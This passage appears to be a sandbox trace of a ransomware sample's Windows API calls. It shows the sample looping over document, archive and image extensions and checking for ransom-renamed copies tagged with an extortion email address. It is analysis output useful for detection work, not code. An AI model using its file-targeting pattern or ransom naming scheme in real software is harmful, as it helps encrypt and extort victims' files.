RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456cbe0, Size=0x20) returned 0x458c240 [0178.765] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0178.766] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0178.766] Wow64DisableWow64FsRedirection (in: OldValue=0x38bff50 | out: OldValue=0x38bff50*=0x1) returned 1 [0178.766] lstrlenW (lpString="kernel32.dll") returned 12 [0178.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c240 | out: hHeap=0x6a0000) returned 1 [0178.766] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0178.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c178 | out: hHeap=0x6a0000) returned 1 Thread: id = 50 os_tid = 0xe94 [0155.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10000) returned 0x3e20988 [0155.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10000) returned 0x3e30990 [0155.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703410 [0155.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6) returned 0x73b4d8 [0155.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703398 [0155.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100000) returned 0x43b0020 [0155.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x7033b0 [0155.219] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x7033b0, Size=0x20) returned 0x6ddf70 [0155.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703428 [0155.219] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x703428, Size=0x20) returned 0x6dde80 [0155.219] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0155.219] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0155.219] Wow64DisableWow64FsRedirection (in: OldValue=0x39fff50 | out: OldValue=0x39fff50*=0x0) returned 1 [0155.219] lstrlenW (lpString="kernel32.dll") returned 12 [0155.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddf70 | out: hHeap=0x6a0000) returned 1 [0155.220] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0155.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dde80 | out: hHeap=0x6a0000) returned 1 [0155.220] Sleep (dwMilliseconds=0x64) [0155.593] lstrcmpiW (lpString1=".ini", lpString2=".bat") returned 1 [0155.593] lstrlenW (lpString="desktop.ini") returned 11 [0155.593] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0155.594] GetFileSizeEx (in: hFile=0x34c, lpFileSize=0x39fff14 | out: lpFileSize=0x39fff14*=129) returned 1 [0155.594] CloseHandle (hObject=0x34c) returned 1 [0155.594] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini")) returned 0x26 [0155.594] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0x26 [0155.596] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0155.596] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0155.596] lstrlenW (lpString=".doc") returned 4 [0155.596] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0155.596] lstrlenW (lpString=".docx") returned 5 [0155.596] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0155.596] lstrlenW (lpString=".pdf") returned 4 [0155.596] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0155.596] lstrlenW (lpString=".xls") returned 4 [0155.596] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0155.597] lstrlenW (lpString=".xlsx") returned 5 [0155.597] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0155.597] lstrlenW (lpString=".ppt") returned 4 [0155.597] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0155.597] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0155.597] lstrlenW (lpString=".zip") returned 4 [0155.597] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0155.597] lstrlenW (lpString=".rar") returned 4 [0155.597] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0155.597] lstrlenW (lpString=".bz2") returned 4 [0155.597] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0155.597] lstrlenW (lpString=".7z") returned 3 [0155.597] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0155.597] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0155.597] lstrlenW (lpString=".dbf") returned 4 [0155.597] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0155.597] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0155.597] lstrlenW (lpString=".1cd") returned 4 [0155.597] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0155.597] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0155.597] lstrlenW (lpString=".jpg") returned 4 [0155.597] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0155.597] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0155.597] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0155.597] lstrlenW (lpString=".doc") returned 4 [0155.597] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0155.598] lstrlenW (lpString=".docx") returned 5 [0155.598] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0155.598] lstrlenW (lpString=".pdf") returned 4 [0155.598] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0155.598] lstrlenW (lpString=".xls") returned 4 [0155.598] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0155.598] lstrlenW (lpString=".xlsx") returned 5 [0155.598] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0155.598] lstrlenW (lpString=".ppt") returned 4 [0155.598] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0155.598] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0155.598] lstrlenW (lpString=".zip") returned 4 [0155.598] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0155.598] lstrlenW (lpString=".rar") returned 4 [0155.598] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0155.598] lstrlenW (lpString=".bz2") returned 4 [0155.598] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0155.598] lstrlenW (lpString=".7z") returned 3 [0155.598] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0155.598] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0155.598] lstrlenW (lpString=".dbf") returned 4 [0155.598] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0155.598] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0155.598] lstrlenW (lpString=".1cd") returned 4 [0155.598] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0155.598] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 73 [0155.598] lstrlenW (lpString=".jpg") returned 4 [0155.598] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0155.599] Sleep (dwMilliseconds=0x64) [0156.202] Sleep (dwMilliseconds=0x64) [0156.867] Sleep (dwMilliseconds=0x64) [0157.263] Sleep (dwMilliseconds=0x64) [0157.482] Sleep (dwMilliseconds=0x64) [0157.942] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0157.942] lstrlenW (lpString="ea.xml") returned 6 [0157.942] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.090] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x39fff14 | out: lpFileSize=0x39fff14*=384) returned 1 [0158.090] CloseHandle (hObject=0x414) returned 1 [0158.090] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml")) returned 0x20 [0158.090] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.181] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0158.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0158.221] lstrlenW (lpString=".doc") returned 4 [0158.221] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0158.221] lstrlenW (lpString=".docx") returned 5 [0158.221] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0158.221] lstrlenW (lpString=".pdf") returned 4 [0158.221] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0158.221] lstrlenW (lpString=".xls") returned 4 [0158.221] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0158.221] lstrlenW (lpString=".xlsx") returned 5 [0158.221] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0158.221] lstrlenW (lpString=".ppt") returned 4 [0158.221] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0158.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0158.221] lstrlenW (lpString=".zip") returned 4 [0158.221] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0158.222] lstrlenW (lpString=".rar") returned 4 [0158.222] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0158.222] lstrlenW (lpString=".bz2") returned 4 [0158.222] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0158.222] lstrlenW (lpString=".7z") returned 3 [0158.222] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0158.222] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0158.222] lstrlenW (lpString=".dbf") returned 4 [0158.222] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0158.222] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0158.222] lstrlenW (lpString=".1cd") returned 4 [0158.222] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0158.222] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0158.222] lstrlenW (lpString=".jpg") returned 4 [0158.222] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0158.222] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0158.222] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0158.222] lstrlenW (lpString=".doc") returned 4 [0158.222] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0158.222] lstrlenW (lpString=".docx") returned 5 [0158.222] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0158.222] lstrlenW (lpString=".pdf") returned 4 [0158.222] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0158.222] lstrlenW (lpString=".xls") returned 4 [0158.222] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0158.222] lstrlenW (lpString=".xlsx") returned 5 [0158.222] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0158.222] lstrlenW (lpString=".ppt") returned 4 [0158.223] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0158.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0158.223] lstrlenW (lpString=".zip") returned 4 [0158.223] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0158.223] lstrlenW (lpString=".rar") returned 4 [0158.223] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0158.223] lstrlenW (lpString=".bz2") returned 4 [0158.223] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0158.223] lstrlenW (lpString=".7z") returned 3 [0158.223] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0158.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0158.223] lstrlenW (lpString=".dbf") returned 4 [0158.223] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0158.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0158.223] lstrlenW (lpString=".1cd") returned 4 [0158.223] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0158.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0158.223] lstrlenW (lpString=".jpg") returned 4 [0158.223] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0158.223] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0158.223] lstrlenW (lpString="Stars.jpg") returned 9 [0158.223] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.225] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x39fff14 | out: lpFileSize=0x39fff14*=7505) returned 1 [0158.225] CloseHandle (hObject=0x414) returned 1 [0158.225] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg")) returned 0x20 [0158.225] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.226] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.226] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 67 [0158.226] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 67 [0158.226] lstrlenW (lpString=".doc") returned 4 [0158.226] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0158.226] lstrlenW (lpString=".docx") returned 5 [0158.226] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0158.226] lstrlenW (lpString=".pdf") returned 4 [0158.226] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0158.226] lstrlenW (lpString=".xls") returned 4 [0158.226] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0158.226] lstrlenW (lpString=".xlsx") returned 5 [0158.226] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0158.226] lstrlenW (lpString=".ppt") returned 4 [0158.226] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0158.226] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 67 [0158.226] lstrlenW (lpString=".zip") returned 4 [0158.226] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0158.226] lstrlenW (lpString=".rar") returned 4 [0158.226] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0158.226] lstrlenW (lpString=".bz2") returned 4 [0158.226] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0158.226] lstrlenW (lpString=".7z") returned 3 [0158.226] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0158.227] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 67 [0158.227] lstrlenW (lpString=".dbf") returned 4 [0158.227] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0158.227] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 67 [0158.227] lstrlenW (lpString=".1cd") returned 4 [0158.227] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0158.227] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 67 [0158.227] lstrlenW (lpString=".jpg") returned 4 [0158.227] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0158.227] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 67 [0158.227] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 67 [0158.227] lstrlenW (lpString=".doc") returned 4 [0158.227] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0158.227] lstrlenW (lpString=".docx") returned 5 [0158.227] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0158.227] lstrlenW (lpString=".pdf") returned 4 [0158.227] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0158.227] lstrlenW (lpString=".xls") returned 4 [0158.227] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0158.227] lstrlenW (lpString=".xlsx") returned 5 [0158.227] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0158.227] lstrlenW (lpString=".ppt") returned 4 [0158.227] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0158.227] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 67 [0158.227] lstrlenW (lpString=".zip") returned 4 [0158.227] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0158.227] lstrlenW (lpString=".rar") returned 4 [0158.228] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0158.228] lstrlenW (lpString=".bz2") returned 4 [0158.228] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0158.228] lstrlenW (lpString=".7z") returned 3 [0158.228] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0158.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 67 [0158.228] lstrlenW (lpString=".dbf") returned 4 [0158.228] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0158.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 67 [0158.228] lstrlenW (lpString=".1cd") returned 4 [0158.228] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0158.228] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 67 [0158.228] lstrlenW (lpString=".jpg") returned 4 [0158.228] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0158.228] lstrcmpiW (lpString1=".bmp", lpString2=".bat") returned 1 [0158.228] lstrlenW (lpString="verisign.bmp") returned 12 [0158.228] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.230] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x39fff14 | out: lpFileSize=0x39fff14*=2702) returned 1 [0158.230] CloseHandle (hObject=0x414) returned 1 [0158.230] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp")) returned 0x20 [0158.230] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\services\\verisign.bmp.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.230] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0158.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0158.230] lstrlenW (lpString=".doc") returned 4 [0158.230] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0158.230] lstrlenW (lpString=".docx") returned 5 [0158.230] lstrcmpiW (lpString1=".docx", lpString2="n.bmp") returned -1 [0158.230] lstrlenW (lpString=".pdf") returned 4 [0158.230] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0158.230] lstrlenW (lpString=".xls") returned 4 [0158.230] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0158.230] lstrlenW (lpString=".xlsx") returned 5 [0158.230] lstrcmpiW (lpString1=".xlsx", lpString2="n.bmp") returned -1 [0158.230] lstrlenW (lpString=".ppt") returned 4 [0158.231] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0158.231] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0158.231] lstrlenW (lpString=".zip") returned 4 [0158.231] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0158.231] lstrlenW (lpString=".rar") returned 4 [0158.231] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0158.231] lstrlenW (lpString=".bz2") returned 4 [0158.231] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0158.231] lstrlenW (lpString=".7z") returned 3 [0158.231] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0158.231] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0158.231] lstrlenW (lpString=".dbf") returned 4 [0158.231] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0158.231] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0158.231] lstrlenW (lpString=".1cd") returned 4 [0158.231] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0158.231] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0158.231] lstrlenW (lpString=".jpg") returned 4 [0158.231] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0158.231] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0158.231] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0158.231] lstrlenW (lpString=".doc") returned 4 [0158.231] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0158.231] lstrlenW (lpString=".docx") returned 5 [0158.231] lstrcmpiW (lpString1=".docx", lpString2="n.bmp") returned -1 [0158.231] lstrlenW (lpString=".pdf") returned 4 [0158.232] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0158.232] lstrlenW (lpString=".xls") returned 4 [0158.232] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0158.232] lstrlenW (lpString=".xlsx") returned 5 [0158.232] lstrcmpiW (lpString1=".xlsx", lpString2="n.bmp") returned -1 [0158.232] lstrlenW (lpString=".ppt") returned 4 [0158.232] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0158.232] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0158.232] lstrlenW (lpString=".zip") returned 4 [0158.232] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0158.232] lstrlenW (lpString=".rar") returned 4 [0158.232] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0158.232] lstrlenW (lpString=".bz2") returned 4 [0158.232] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0158.232] lstrlenW (lpString=".7z") returned 3 [0158.232] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0158.232] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0158.232] lstrlenW (lpString=".dbf") returned 4 [0158.232] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0158.232] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0158.232] lstrlenW (lpString=".1cd") returned 4 [0158.232] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0158.232] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0158.232] lstrlenW (lpString=".jpg") returned 4 [0158.232] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0158.233] lstrcmpiW (lpString1=".inc", lpString2=".bat") returned 1 [0158.233] lstrlenW (lpString="adojavas.inc") returned 12 [0158.233] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.234] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x39fff14 | out: lpFileSize=0x39fff14*=14856) returned 1 [0158.234] CloseHandle (hObject=0x414) returned 1 [0158.234] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc")) returned 0x20 [0158.234] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common 